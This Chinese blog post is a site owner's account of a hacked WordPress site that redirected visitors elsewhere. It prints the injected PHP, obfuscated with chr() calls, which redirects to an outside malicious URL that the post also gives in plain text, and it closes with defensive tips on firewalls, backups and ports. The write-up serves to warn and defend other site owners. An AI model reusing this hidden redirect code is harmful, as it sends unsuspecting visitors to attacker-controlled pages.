网站被黑wordpress站点被恶意重定向

站长

发表文章数:4335

首页 » 值得一看 » 正文

今天中午发现我的网站被恶意重定向了,通过日志发现是有人通过网站下载备份包压缩包获取密码数据库信息,我也百度了一下也有很多同样遭遇应为插件后门系统本身后台漏洞注入病毒,所以说防火墙,压缩包,端口,网站数据备份非常有必要注意,下面给大家一些方法避免很多萌新站长也莫名奇妙的被挂马

网站被黑wordpress站点被恶意重定向

具体添加内容

网站被黑wordpress站点被恶意重定向

导致重定向到https://irc.lovegreenpencils.ga/55ryery?id=22584&rs=2346

大佬们也可以分析一下这段代码

<?php $a="h"."ea"."der";$a(chr(76).chr(111).chr(99).chr(97).chr(116).chr(105).chr(111).chr(110).chr(58).chr(32).chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(105).chr(114).chr(99).chr(46).chr(108).chr(111).chr(118).chr(101).chr(103).chr(114).chr(101).chr(101).chr(110).chr(112).chr(101).chr(110).chr(99).chr(105).chr(108).chr(115).chr(46).chr(103).chr(97).chr(47).chr(53).chr(53).chr(114).chr(121).chr(101).chr(114).chr(121).chr(63).chr(105).chr(100).chr(61).chr(50).chr(50).chr(53).chr(56).chr(52).chr(38).chr(114).chr(115).chr(61).chr(50).chr(51).chr(52).chr(54));?><?php

1.防火墙

防火墙有很多种类比如说:(网络层防火墙,应用层防火墙

网络层防火墙:


例如:来源 IP 地址、来源端口号、目的 IP 地址或端口号、服务类型(如 WWW 或是 FTP)。也能经由通信协议、TTL 值、来源的网域名称或网段...等
 xss云小编也整合比简单较好用的方法  比如:用cdn来阻止恶意入侵,注入,利用后门   注:推荐创宇云

应用层防火墙:

常见的就比如宝塔自带的防火墙

 

2.压缩包:

经常网站会把压缩包放在网站根目录,导致很多人通过下载网站压缩包来获取账号密码,所以最好不要在根目录放压缩包

 

3.端口:

端口对大家应该不陌生,一般不用的时候尽量把端口关闭只留80,443

4.网站数据备份:

网站数据备份是最重要的不管怎么入侵,只要有备份数据在恢复和修复漏洞都是比较快的

 

奉劝大家一句 数据无价还是要多多备份 差点翻车的教训

未经允许不得转载作者:站长, 转载或复制请以 超链接形式 并注明出处 xss云之家,资源网,娱乐网,网络技术资源分享平台
原文地址:《网站被黑wordpress站点被恶意重定向》 发布于2021-02-14

分享到:
赞(0) 打赏 生成海报

评论 抢沙发

7 + 3 =


长按图片转发给朋友

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏

投稿赚钱
2020年在家赚取零花钱
切换注册

登录

忘记密码 ?

您也可以使用第三方帐号快捷登录

Q Q 登 录
微 博 登 录
切换登录

注册